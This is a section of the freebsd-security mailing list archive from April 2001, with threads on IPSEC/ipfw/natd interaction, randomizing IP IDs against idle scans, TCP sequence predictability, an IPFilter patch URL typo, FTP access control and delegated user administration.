From: Brian Candler To: Cy Schubert - ITSD Open Systems Group Cc: Lowell Gilbert , Rasputin , freebsd-security@FreeBSD.ORG Subject: Re: Interaction between ipfw, IPSEC and natd Message-ID: <20010416210950.A14903@linnet.org> References: <20010416112358.A13561@linnet.org> <200104161914.f3GJEMh06453@cwsys.cwsent.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: <200104161914.f3GJEMh06453@cwsys.cwsent.com>; from Cy.Schubert@uumail.gov.bc.ca on Mon, Apr 16, 2001 at 12:14:05PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Apr 16, 2001 at 12:14:05PM -0700, Cy Schubert - ITSD Open Systems Group wrote: > I've noticed this with IP Filter as well. For applications where this > is a critical issue, I use the pipsecd port, allowing me to filter on > the external interface (xl0, fxp0, etc), e.g. AH and ESP, and the > tun(4) interface that pipsecd is attached to, e.g. TCP, UDP, ICMP. Ah yes, that's one solution. But pipsecd is limited, e.g. it only supports manually-keyed tunnels AFAIK. A userland implementation like pipsecd, but which used a divert(4) socket like natd, would be cool. Then the sequence of protocol processing would be explicit in the ipfw ruleset. However I can see ipfw becoming less used as people move to ipf(ilter) these days. At least the interaction between ipf and ipnat is documented, if not with IPSEC: http://coombs.anu.edu.au/~avalon/ipfil-flow.html > I realise that this was discussed on this list within the past 6 months > and that one the KAME developers (KAME is obviously IPv6 focused) > indicated that IPv6 addressing would not allow for IPSec packets being > filtered on an interface because IPv6 addresses span all interfaces. Hmm, I don't think that's right. In general, IPv6 addresses _are_ specific to an interface just like IPv4, apart from some special addresses, e.g. link-local and loopback, or multicast. 
And in any case, a packet coming in through (say) fxp0 can still be tagged
as coming in through fxp0. There is even a standard syntax for supporting
link-local addresses on a specific interface: e.g.

    # ping6 fe80::260:97ff:fe40:efab%fxp0

Brian.

From owner-freebsd-security Mon Apr 16 13:16:00 2001
Message-ID: <3ADB52F4.1A7058B9@globalstar.com>
Date: Mon, 16 Apr 2001 13:15:48 -0700
From: "Crist Clark"
Organization: Globalstar LP
To: Kris Kennaway
Cc: Barney Wolff, "E.B. Dreger", Wes Peters, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
References: <20010416121019.D10023@xor.obsecurity.org> <20010416154249.A49858@mx.databus.com> <20010416125053.A11446@xor.obsecurity.org>

Kris Kennaway wrote:
>
> On Mon, Apr 16, 2001 at 03:42:49PM -0400, Barney Wolff wrote:
> > If ip_randomid() is an asm rather than C code, I have sometimes
> > seen problems with an asm func calling another asm func. That
> > was long ago and far away, but is the only reason I can think of
> > for that change.
> >
> > But whether the id is random or a counter, there is no reason to
> > htons it, as long as it's treated consistently, with externals
> > never compared with internals.
>
> Surely that can't work since the purpose of that field is for received
> packet ordering (unless I'm wrong, I'm not an IPv4 guru and only
> skimmed the RFC), and what's ordered in network order isn't ordered in
> host order.

The IP ID and the Fragment Offset are different fields within the IPv4
header. At least that's what I think you are saying.

As far as the whole thread goes, no, I cannot visualize a situation where
the IP ID would need to be htons()'ed. The machine generating a datagram
creates a "unique" IP ID for each outgoing datagram (actually the IP ID
only needs to be unique for each source host, destination host, and
protocol). No routers in between ever change it; the receiving machine
just uses it to figure out what fragmented datagrams go together to
assemble the original datagram. The only question that arises is whether
a non-htons'ed field is any less "unique" than the htons'ed one.
People have mentioned that we might have a problem with wrap-around.
However, preventing wrap-around from happening too quickly is just a
simple-minded way to ensure pseudo-uniqueness of IDs. There are no
requirements about wrap-around in and of itself. Even if you do use an
algorithm that wraps the in-kernel value slowly to prevent wrap-around,
the IDs on the wire in the reversed byte-order will be just as unique
because of it.
--
Crist J. Clark                          Network Security Engineer
crist.clark@globalstar.com              Globalstar, L.P.
(408) 933-4387                          FAX: (408) 933-4926

From owner-freebsd-security Mon Apr 16 14:17:37 2001
From: "Seth Andreas Hieronymus"
Subject: tcp sequence prediction question
Date: Mon, 16 Apr 2001 15:17:46 -0600

Hello,

When comparing nmap -O output for my FreeBSD server (4.3RC4) and a Linux
machine (2.4), there are significant differences in their tcp sequence
prediction difficulties. FreeBSD only had on the order of 15,000 - 20,000,
while Linux had 3,000,000 - 5,000,000. I saw that the security advisory
FreeBSD-SA-00:52.tcp-iss.asc was an attempt to strengthen the randomness
of this. Did it help? What is going on with the large differences? Is this
a problem at all?

Thanks very much. Hope I got the right list.

Seth

--- Signature ---
Seth Andreas Hieronymus
President
Hieronymus Technologies, Inc.
223 North Wahsatch Avenue, Suite 205
Colorado Springs, CO 80903
719.328.1881
shieronymus@hiertech.com

From owner-freebsd-security Mon Apr 16 14:46:16 2001
Subject: Re: non-random IP IDs
From: Niels Provos
In-Reply-To: Kris Kennaway, Mon, 16 Apr 2001 12:10:19 PDT
To: Kris Kennaway
Cc: Wes Peters, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Date: Mon, 16 Apr 2001 17:46:11 -0400
Message-Id: <20010416214611.6DA3F207C1@citi.umich.edu>

In message <20010416121019.D10023@xor.obsecurity.org>, Kris Kennaway writes:
>Presumably there was some reasoning there. Niels, can you shed any
>light?
No reasoning. You do not need the htons(). The fragment ids just
need to be unique. An htons() does not change that property. I don't
like that code very much. A variable-block-size cipher in counter
mode would do the job better.

However, what many ppl do not realize is that you can use predictable
ip ids to anonymously port scan machines. Bugtraq talks about how to
do that.

Niels.

From owner-freebsd-security Mon Apr 16 15:07:57 2001
Message-Id: <200104162207.SAA10151@ns.shellworld.net>
From: "Tommy Forrest - KE4PYM"
To: "Chris Faulhaber", "Igor Podlesny"
Cc: "Darren Reed", "freebsd-security@FreeBSD.ORG"
Date: Mon, 16 Apr 2001 18:11:36 -0400
In-Reply-To: <20010416085048.A66477@peitho.fxp.org>
Subject: Re: URGENT: Serious bug in IPFilter (fwd)

So why is it that I get:

weedwhacker $ fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch
fetch: ipfilter.patch: File unavailable (e.g., file not found, no access)

On Mon, 16 Apr 2001 08:50:48 -0400, Chris Faulhaber wrote:

>On Mon, Apr 16, 2001 at 08:14:23PM +0700, Igor Podlesny wrote:
>>
>> Hi!
>>
>> Guys, what's going on?
>> Is the patch still not available in the CVS tree yet?!
>>
>
>As previously stated, the fixes have been committed to -current
>and -stable. For example:
>
>Revision 1.10.2.4 / (download) - annotate - [select for diffs], Sat Apr 7 03:40:31 2001 UTC (9 days, 9 hours ago) by darrenr
>Branch: RELENG_4
>
>fix security hole created by fragment cache
>
>
>Revision 1.15 / (download) - annotate - [select for diffs], Fri Apr 6 15:52:28 2001 UTC (9 days, 20 hours ago) by darrenr
>Branch: MAIN
>CVS Tags: HEAD
>
>fix security hole created by fragment cache
>
>
>From http://www.FreeBSD.org/cgi/cvsweb.cgi/src/sys/netinet/ip_frag.c
>
>--
>Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
>--------------------------------------------------------
>FreeBSD: The Power To Serve - http://www.FreeBSD.org

Tommy Forrest - KE4PYM - tforrest@shellworld.net
http://www.shellworld.net/~tforrest
And now, it's time, for some useless, bandwidth wasting words of wisdom:
I'm an OS/2 developer...I don't NEED a life!
PGP Public Key Fingerprint: B9ED C46F C92E 0101 4B4C BFC1 907C A0D0

From owner-freebsd-security Mon Apr 16 18:29:19 2001
Date: Mon, 16 Apr 2001 21:28:55 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200104170128.VAA02080@khavrinen.lcs.mit.edu>
To: Kris Kennaway
Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: non-random IP IDs
In-Reply-To: <20010416125053.A11446@xor.obsecurity.org>
References: <20010416121019.D10023@xor.obsecurity.org> <20010416154249.A49858@mx.databus.com> <20010416125053.A11446@xor.obsecurity.org>

Kris Kennaway said:
> Surely that can't work since the purpose of that field is for received
> packet ordering

No. The IP ID is effectively a nonce with respect to the receiving
system. The only requirement is that IDs not be repeated while any
packet with the same (source, dest) pair is still in the network. This
is in practice impossible, so as with TCP we can simply pretend that all
packets disappear after 60 seconds.

Having said that, on the whole I think this whole idea is utterly
pointless.

-GAWollman

From owner-freebsd-security Mon Apr 16 18:57:26 2001
Date: Mon, 16 Apr 2001 18:57:04 -0700 (PDT)
From: Matt Dillon
Message-Id: <200104170157.f3H1v4d87804@earth.backplane.com>
To: Niels Provos
Cc: Kris Kennaway, Wes Peters, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
References: <20010416214611.6DA3F207C1@citi.umich.edu>

:No reasoning. You do not need the htons(). The fragment ids just
:need to be unique. An htons() does not change that property. I don't
:like that code very much. A variable-block-size cipher in counter
:mode would do the job better.
:
:However, what many ppl do not realize is that you can use predictable
:ip ids to anonymously port scan machines. Bugtraq talks about how to
:do that.
:
:Niels.

    It's not worth doing. We would be introducing unnecessary cpu burn
    on every single packet we sent out, all to solve a problem that
    doesn't really exist. Most people doing port scans don't care
    whether they are anonymous or not, anyway. They just do the scans.

    Also, port scanning software has gotten a whole lot more
    sophisticated these days... usually people want to portscan a whole
    bunch (thousands) of machines all at once, but to prevent detection
    the newer programs randomize the port and host being tested on a
    per-packet basis so any given 'victim' doesn't actually see all that
    much traffic.
                                        -Matt

From owner-freebsd-security Mon Apr 16 20:33:00 2001
Message-ID: <3ADBB93B.3C9DC3DE@elischer.org>
Date: Mon, 16 Apr 2001 20:32:11 -0700
From: Julian Elischer
X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 5.0-CURRENT i386)
To: Darren Reed
Cc: Kris Kennaway, Mike Silbersack, Mark T Roberts, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: non-random IP IDs
References: <200104161836.EAA03291@caligula.anu.edu.au>

Darren Reed wrote:
>
> In some mail from Kris Kennaway, sie said:
> >
> > On Mon, Apr 16, 2001 at 02:03:11AM -0700, Kris Kennaway wrote:
> >
> > > Here's a patch ported from OpenBSD which randomizes this (supposedly
> > > such that it respects the constraint of not wrapping within the
> > > prescribed time period). I should wrap it in a sysctl, I guess.
> > >
> > > http://www.freebsd.org/~kris/ipid.patch
> >
> > Okay, I did this and updated the patch, with the sysctl defaulting to
> > off since the random algorithm does add some amount of overhead.
> >
> > > Comments?
>
> You should optimize it for mod being 2^n-1 (or make that a requirement).
>
> Also, drop the HTONS statements, they no longer make sense. Before ip_id
> was a counter and so it made sense (sorta) to change its byte ordering to
> network. Now it's just a random number so there is no longer any need.

There is a site that calculates server uptime from these numbers.
All the leading machines are FreeBSD. When you do this it will
no-longer be able to track us :-(

What is the problem in having these numbers sequential?
>
> Darren

--
Julian Elischer
julian@elischer.org
World tour 2000-2001

From owner-freebsd-security Mon Apr 16 20:39:01 2001
Date: Mon, 16 Apr 2001 22:38:52 -0500 (CDT)
From: Mike Silbersack
To: Julian Elischer
Cc: Darren Reed, Kris Kennaway, Mark T Roberts
Subject: Re: non-random IP IDs
In-Reply-To: <3ADBB93B.3C9DC3DE@elischer.org>

On Mon, 16 Apr 2001, Julian Elischer wrote:

> There is a site that calculates server uptime from these numbers.
> All the leading machines are FreeBSD. When you do this it will
> no-longer be able to track us :-(

They're using TCP timestamps to do that, not ip ids. And if I get my
way, those will be unusable for uptime detection soon enough... :)

> What is the problem in having these numbers sequential?

Anonymous port scans, some firewall probing as mentioned by Darren, and
the ability to see the idleness of a host. Not enough to make
randomization the default policy, but certainly enough to justify a
sysctl.

Mike "Silby" Silbersack

From owner-freebsd-security Mon Apr 16 20:45:49 2001
Date: Mon, 16 Apr 2001 20:45:42 -0700
From: Kris Kennaway
To: Julian Elischer
Cc: freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: non-random IP IDs
Message-ID: <20010416204542.A18881@xor.obsecurity.org>
References: <200104161836.EAA03291@caligula.anu.edu.au> <3ADBB93B.3C9DC3DE@elischer.org>
In-Reply-To: <3ADBB93B.3C9DC3DE@elischer.org>

On Mon, Apr 16, 2001 at 08:32:11PM -0700, Julian Elischer wrote:
> There is a site that calculates server uptime from these numbers.
> All the leading machines are FreeBSD. When you do this it will
> no-longer be able to track us :-(

As explained by Mike, the uptime fingerprinting doesn't involve IP IDs,
but regardless, information leaks of this kind make it easier to exploit
various network stack vulnerabilities. Knowing things like whether a
host is idle, being able to measure the rate at which it is generating
traffic (without observing the traffic directly), knowing its precise
uptime, etc may allow you to mount various attacks (e.g. some of the IP
stack vulnerabilities discovered in the past rely on knowing or being
able to accurately guess this information).

Not everyone may care to reduce this information exposure (e.g. it can
add processing overhead which you may not want on a heavily-loaded
server), but it should at least be made possible.
Kris

From owner-freebsd-security Mon Apr 16 22:17:35 2001
Date: Mon, 16 Apr 2001 22:17:32 -0700
From: Kris Kennaway
To: Tommy Forrest - KE4PYM
Cc: Chris Faulhaber, Igor Podlesny, Darren Reed, "freebsd-security@FreeBSD.ORG"
Subject: Re: URGENT: Serious bug in IPFilter (fwd)
Message-ID: <20010416221732.A20245@xor.obsecurity.org>
References: <20010416085048.A66477@peitho.fxp.org> <200104162207.SAA10151@ns.shellworld.net>
In-Reply-To: <200104162207.SAA10151@ns.shellworld.net>

On Mon, Apr 16, 2001 at 06:11:36PM -0400, Tommy Forrest - KE4PYM wrote:
> So why is it that I get:
>
> weedwhacker $ fetch
> ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch
> fetch: ipfilter.patch: File unavailable (e.g., file not found, no
> access)

There was a typo in the advisory; it should be SA-01:32

Kris

From owner-freebsd-security Mon Apr 16 23:30:49 2001
Date: Mon, 16 Apr 2001 23:30:42 -0700
From: Kris Kennaway
To: Matt Dillon
Cc: Niels Provos, Kris Kennaway, Wes Peters, freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG, provos@OpenBSD.org
Subject: Re: non-random IP IDs
Message-ID: <20010416233042.A21394@xor.obsecurity.org>
References: <20010416214611.6DA3F207C1@citi.umich.edu> <200104170157.f3H1v4d87804@earth.backplane.com>
In-Reply-To: <200104170157.f3H1v4d87804@earth.backplane.com>

On Mon, Apr 16, 2001 at 06:57:04PM -0700, Matt Dillon wrote:
>
> :No reasoning. You do not need the htons(). The fragment ids just
> :need to be unique. An htons() does not change that property. I don't
> :like that code very much. A variable-block-size cipher in counter
> :mode would do the job better.
> :
> :However, what many ppl do not realize is that you can use predictable
> :ip ids to anonymously port scan machines. Bugtraq talks about how to
> :do that.
> :
> :Niels.
>
> It's not worth doing. We would be introducing unnecessary cpu burn on
> every single packet we sent out, all to solve a problem that doesn't
> really exist.

Well, that's why it's a sysctl defaulting to off in my patch. Don't
turn it on if you don't want to.
Kris

From owner-freebsd-security Mon Apr 16 23:59:05 2001
Date: Tue, 17 Apr 2001 09:57:27 +0300
From: Peter Pentchev
To: Khalil Haddad
Cc: Fernando Schapachnik, security@FreeBSD.ORG
Subject: Re: FTP - block outer connections
Message-ID: <20010417095727.A4070@ringworld.oblivion.bg>
References: <200104161651.NAA26855@ns1.via-net-works.net.ar> <001c01c0c69e$d44889f0$0200a8c0@khalil>
In-Reply-To: <001c01c0c69e$d44889f0$0200a8c0@khalil>

On Mon, Apr 16, 2001 at 07:58:23PM +0200, Khalil Haddad wrote:
> thx for your answer
> i changed my hosts.allow and made a rule to deny all and to allow only the
> ip of the machine i want to ftp in
>
> but how do you make the changes to take effect ? i did not find this in the
> man pages (other than reboot)

The hosts.allow and hosts.deny files are examined upon every invocation
of the TCP wrapper; that is, upon every incoming FTP connection. You do
not need to do anything more after changing the hosts.* files.

G'luck,
Peter

--
If wishes were fishes, the antecedent of this conditional would be true.

From owner-freebsd-security Tue Apr 17 00:30:08 2001
Date: Tue, 17 Apr 2001 10:29:32 +0300
From: Alexandr Listopad
To: Adam Laurie
Cc: Khalil Haddad, security@FreeBSD.ORG
Subject: Re: FTP - block outer connections
Message-ID: <20010417102932.B28335@laa.zp.ua>
References: <002701c0c694$6774ef30$0200a8c0@khalil> <3ADB4050.855FE1F6@algroup.co.uk>
In-Reply-To: <3ADB4050.855FE1F6@algroup.co.uk>

On Mon, Apr 16, 2001 at 07:56:16PM +0100, Adam Laurie wrote:
> Khalil Haddad wrote:
> >
> > Hello all
> > i got an FBSD box running FTPD
> > I would like to listen only to ONE of my nic cards , ie the one that is not
> > connected to the net anyone can help me securing it ?
>
> remove ftp from /etc/inetd.conf and run it as a daemon instead:
>
> ftpd -D -a

Is there any chance to use TCP wrappers in this case?

--
Laa

From owner-freebsd-security Tue Apr 17 03:25:37 2001
Message-ID: <3ADC1A01.387C9705@algroup.co.uk>
Date: Tue, 17 Apr 2001 11:25:05 +0100
From: Adam Laurie
To: Alexandr Listopad
Cc: Khalil Haddad, security@FreeBSD.ORG
Subject: Re: FTP - block outer connections
References: <002701c0c694$6774ef30$0200a8c0@khalil> <3ADB4050.855FE1F6@algroup.co.uk> <20010417102932.B28335@laa.zp.ua>

Alexandr Listopad wrote:
>
> On Mon, Apr 16, 2001 at 07:56:16PM +0100, Adam Laurie wrote:
> > Khalil Haddad wrote:
> > >
> > > Hello all
> > > i got an FBSD box running FTPD
> > > I would like to listen only to ONE of my nic cards , ie the one that is not
> > > connected to the net anyone can help me securing it ?
> >
> > remove ftp from /etc/inetd.conf and run it as a daemon instead:
> >
> > ftpd -D -a
>
> Is there any chance to use TCP wrappers in this case?

No, but as you're already only listening on the interface you trust you
should be ok anyway.... but to be sure you only get connections from
where you want you could enable ipfilter and anti-spoof/host specific
rules...

cheers,
Adam
--
Adam Laurie                 Tel: +44 (20) 8742 0755
A.L. Digital Ltd.           Fax: +44 (20) 8742 5995
Voysey House                http://www.thebunker.net
Barley Mow Passage          http://www.aldigital.co.uk
London W4 4GB               mailto:adam@algroup.co.uk
UNITED KINGDOM              PGP key on keyservers

From owner-freebsd-security Tue Apr 17 04:29:01 2001
From: Darren Reed
Message-Id: <200104171128.VAA08430@caligula.anu.edu.au>
Subject: Re: non-random IP IDs
To: julian@elischer.org (Julian Elischer)
Date: Tue, 17 Apr 2001 21:28:25 +1000 (Australia/ACT)
Cc: avalon@coombs.anu.edu.au (Darren Reed), kris@obsecurity.org (Kris Kennaway), silby@silby.com (Mike Silbersack), newsletter@marktroberts.com (Mark T Roberts), freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
In-Reply-To: <3ADBB93B.3C9DC3DE@elischer.org> from "Julian Elischer" at Apr 16, 2001 08:32:11 PM

In some mail from Julian Elischer, sie said:
>
> Darren Reed wrote:
> >
> > In some mail from Kris Kennaway, sie said:
> > >
> > > On Mon, Apr 16, 2001 at 02:03:11AM -0700, Kris Kennaway wrote:
> > >
> > > > Here's a patch ported from OpenBSD which randomizes this (supposedly
> > > > such that it respects the constraint of not wrapping within the
> > > > prescribed time period). I should wrap it in a sysctl, I guess.
> > > >
> > > > http://www.freebsd.org/~kris/ipid.patch
> > >
> > > Okay, I did this and updated the patch, with the sysctl defaulting to
> > > off since the random algorithm does add some amount of overhead.
> > >
> > > > Comments?
> >
> > You should optimize it for mod being 2^n-1 (or make that a requirement).
> >
> > Also, drop the HTONS statements, they no longer make sense. Before ip_id
> > was a counter and so it made sense (sorta) to change its byte ordering to
> > network. Now it's just a random number so there is no longer any need.
>
> There is a site that calculates server uptime from these numbers.
> All the leading machines are FreeBSD.
> When you do this it will
> no-longer be able to track us :-(

IMHO, extraordinarily large uptimes are nothing to be proud of and
say nothing about the quality of software.

I'd almost go so far as to say uptimes greater than 1 year indicate
that the system administration practices need review.

Darren

From owner-freebsd-security Tue Apr 17 4:31:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from fw.wintelcom.net (ns1.wintelcom.net [209.1.153.20]) by hub.freebsd.org (Postfix) with ESMTP id 62E9F37B422; Tue, 17 Apr 2001 04:31:36 -0700 (PDT) (envelope-from bright@fw.wintelcom.net)
Received: (from bright@localhost) by fw.wintelcom.net (8.10.0/8.10.0) id f3HBVUK09190; Tue, 17 Apr 2001 04:31:30 -0700 (PDT)
Date: Tue, 17 Apr 2001 04:31:30 -0700
From: Alfred Perlstein
To: Darren Reed
Cc: Julian Elischer , freebsd-security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: non-random IP IDs
Message-ID: <20010417043130.F976@fw.wintelcom.net>
References: <3ADBB93B.3C9DC3DE@elischer.org> <200104171128.VAA08430@caligula.anu.edu.au>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104171128.VAA08430@caligula.anu.edu.au>; from avalon@coombs.anu.edu.au on Tue, Apr 17, 2001 at 09:28:25PM +1000
X-all-your-base: are belong to us.

* Darren Reed [010417 04:29] wrote:
> In some mail from Julian Elischer, sie said:
> >
> > there is a site that calculates server uptime from these numbers.
> > All the leading machines are freeBSD. When you do this it will
> > no-longer be able to track us :-(
>
> IMHO, extraordinarily large uptimes are nothing to be proud of and
> say nothing about the quality of software.
>
> I'd almost go so far as to say uptimes greater than 1 year indicate
> that the system administration practices need review.

Agreed. I've yet to hear about any seriously deployed system
go without security advisories for over a year.
--
-Alfred Perlstein - [bright@wintelcom.net|alfred@freebsd.org]
Represent yourself, show up at BABUG http://www.babug.org/

From owner-freebsd-security Tue Apr 17 6:20:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mine.kame.net (kame195.kame.net [203.178.141.195]) by hub.freebsd.org (Postfix) with ESMTP id 4A9C137B43F for ; Tue, 17 Apr 2001 06:20:16 -0700 (PDT) (envelope-from sakane@ydc.co.jp)
Received: from localhost (PPP11.tama-ap5.dti.ne.jp [210.159.232.11]) by mine.kame.net (8.11.1/3.7W) with ESMTP id f3HDXBY75965; Tue, 17 Apr 2001 22:33:12 +0900 (JST)
To: lionnel.chaptal@IPricot.com
Cc: freebsd-security@freebsd.org
Subject: Re: IPSEC/Racoon/local adress when initiator
In-Reply-To: Your message of "Fri, 13 Apr 2001 12:09:11 +0200" <3AD6D047.91F3F843@IPricot.com>
References: <3AD6D047.91F3F843@IPricot.com>
X-Mailer: Cue version 0.6 (010413-1707/sakane)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Message-Id: <20010417222014P.sakane@ydc.co.jp>
Date: Tue, 17 Apr 2001 22:20:14 +0900
From: Shoichi Sakane
X-Dispatcher: imput version 20000228(IM140)
Lines: 28

> FBSD(eth)--|--(eth)GW(eth)--(eth)Cisco(eth)--|
>            |                                 |--(eth)host
> host(eth)---|

> On the FBSD side, there is only one NIC, so I have set up an alias
> address on the ethernet interface.

Why don't you buy another NIC for FBSD box ?

> So the FBSD eth iface has one address in the net-to-be-tunneled
> (192.168.0.1/24) and another for the tunnel-transported-lan (1.2.3.4 or
> whatever).
> The gateway for the FBSD (GW) has only one address in the same net as
> the net-to-be-tunneled (for instance 192.168.0.254). So racoon is
> binding on the eth iface with the address 192.168.0.1
> [sockmisc.c/getlocaladdr()]. The frames are being sent from 192.168.0.1
> whereas they should come from 1.2.3.4

When racoon is initiator, I think it is not racoon's problem.
It depends on IPv4 source address selection of FreeBSD box.
Actually racoon can recognize alias addresses, and I believe racoon
can use this address as source address when racoon is responder.

So I want to show the whole log of racoon during the negotiation
after racoon started. Please send me directly the log.
/Shoichi Sakane @ KAME project/

From owner-freebsd-security Tue Apr 17 7: 7: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from zeta.qmw.ac.uk (zeta.qmw.ac.uk [138.37.6.6]) by hub.freebsd.org (Postfix) with ESMTP id B144437B424 for ; Tue, 17 Apr 2001 07:07:00 -0700 (PDT) (envelope-from d.m.pick@qmw.ac.uk)
Received: from xi.css.qmw.ac.uk ([138.37.8.11]) by zeta.qmw.ac.uk with esmtp (Exim 3.16 #1) id 14pW85-0004D8-00 for freebsd-security@freebsd.org; Tue, 17 Apr 2001 15:06:53 +0100
Received: from cgaa180 by xi.css.qmw.ac.uk with local (Exim 1.92 #1) for freebsd-security@FreeBSD.ORG id 14pW85-0002Q2-00; Tue, 17 Apr 2001 15:06:53 +0100
X-Mailer: exmh version 2.0.2 2/24/98
To: freebsd-security@FreeBSD.ORG
Subject: Re: Interaction between ipfw, IPSEC and natd
In-reply-to: Your message of "Mon, 16 Apr 2001 12:14:05 PDT." <200104161914.f3GJEMh06453@cwsys.cwsent.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Tue, 17 Apr 2001 15:06:53 +0100
From: David Pick
Message-Id:

> Just sort of thinking out loud here, would some kind of daemon (or
> other facility), that would attach itself to a tun(4) (or other)
> interface, like pipsecd does, but use the kernel's IPSec facility to
> encrypt and encapsulate the packets instead of its own, then inject
> them into the external interface be of use?

I think so - but I don't see why a daemon would be necessary. It
seems to me that the sort of mechanism used by the "gif" interfaces
would be appropriate. It *might* even be possible to extend the "gif"
interface to do the job. The difference being that instead of
encapsulating in an IP "tunnel" it would encapsulate in an IPSEC
"tunnel". It probably would not be either appropriate or necessary
to be able to handle AH-only packets this way.

Of course, I may be talking through my hat; if so I'm sure someone
will tell me...

--
David Pick

From owner-freebsd-security Tue Apr 17 7:39:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wsufftrust.org.uk (mail.wsufftrust.org.uk [194.202.248.194]) by hub.freebsd.org (Postfix) with ESMTP id 6C60137B443 for ; Tue, 17 Apr 2001 07:39:24 -0700 (PDT) (envelope-from lloyd@li5.org)
Received: from 04 (wsufftrust.org.uk [194.202.248.193]) by mail.wsufftrust.org.uk (8.11.1/8.11.1) with SMTP id f3HFjKq76155 for ; Tue, 17 Apr 2001 16:45:21 +0100 (BST) (envelope-from lloyd@li5.org)
Message-Id: <200104171545.f3HFjKq76155@mail.wsufftrust.org.uk>
Date: Tue, 17 Apr 2001 15:33:23 +0000
From: Lloyd Palfrey
Reply-To: lloyd@li5.org
To: "freebsd-security@freebsd.org"
Subject: Add/Remove Users
X-mailer: FoxMail 2.1 [en]
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

I need to create a user just for adding and removing users, I can't use
the existing root or sudo. I can't use sudo because sudo asks for the
current user's password, and not root because I would have to change the
shell to program which would render the root account unusable. Basically
I need to create another root account with remote access. Could you
please advise me on a way of doing this, as security plays a massive job
on this server.

Thanks

From owner-freebsd-security Tue Apr 17 7:44:50 2001
Delivered-To: freebsd-security@freebsd.org
Received: from proxy.centtech.com (moat.centtech.com [206.196.95.10]) by hub.freebsd.org (Postfix) with ESMTP id 3065037B440 for ; Tue, 17 Apr 2001 07:44:46 -0700 (PDT) (envelope-from anderson@centtech.com)
Received: (from smap@localhost) by proxy.centtech.com (8.8.4/8.6.9) id JAA19182; Tue, 17 Apr 2001 09:44:42 -0500 (CDT)
Received: from sprint.centtech.com(10.177.173.31) by proxy.centtech.com via smap (V2.0/2.1+anti-relay+anti-spam) id xma019180; Tue, 17 Apr 01 09:44:32 -0500
Received: from centtech.com (shiva [10.177.173.77]) by sprint.centtech.com (8.9.3+Sun/8.9.3) with ESMTP id JAA08540; Tue, 17 Apr 2001 09:44:31 -0500 (CDT)
Message-ID: <3ADC56CF.D3498E5@centtech.com>
Date: Tue, 17 Apr 2001 09:44:31 -0500
From: Eric Anderson
Reply-To: anderson@centtech.com
Organization: Centaur Technology
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.14-5.0smp i686)
X-Accept-Language: en
MIME-Version: 1.0
To: lloyd@li5.org
Cc: "freebsd-security@freebsd.org"
Subject: Re: Add/Remove Users
References: <200104171545.f3HFjKq76155@mail.wsufftrust.org.uk>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

You should check out the man page for sudo, since you can set the
NOPASSWD option to not ask for passwords..

Lloyd Palfrey wrote:
>
> I need to create a user just for adding and removing users, I can't use the existing root or sudo. I can't use sudo
> because sudo asks for the current user's password, and not root because I would have to change the shell to
> program which would render the root account unusable. Basically I need to create another root account with
> remote access. Could you please advise me on a way of doing this, as security plays a massive job on this
> server.
>
> Thanks

--
-------------------------------------------------------------------------------
Eric Anderson           anderson@centtech.com
Centaur Technology      (512) 418-5792
Never have so many understood so little about so much.
-------------------------------------------------------------------------------

From owner-freebsd-security Tue Apr 17 7:54:30 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 13FB337B443 for ; Tue, 17 Apr 2001 07:54:24 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id KAA10464; Tue, 17 Apr 2001 10:54:14 -0400 (EDT) (envelope-from wollman)
Date: Tue, 17 Apr 2001 10:54:14 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200104171454.KAA10464@khavrinen.lcs.mit.edu>
To: Alfred Perlstein
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: non-random IP IDs
In-Reply-To: <20010417043130.F976@fw.wintelcom.net>
References: <3ADBB93B.3C9DC3DE@elischer.org> <200104171128.VAA08430@caligula.anu.edu.au> <20010417043130.F976@fw.wintelcom.net>

< said:

> Agreed. I've yet to hear about any seriously deployed system
> go without security advisories for over a year.

Most of those security problems do not require an actual reboot to fix.

-GAWollman

From owner-freebsd-security Tue Apr 17 9: 6:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2527C37B422; Tue, 17 Apr 2001 09:06:32 -0700 (PDT) (envelope-from jwyatt@rwsystems.net)
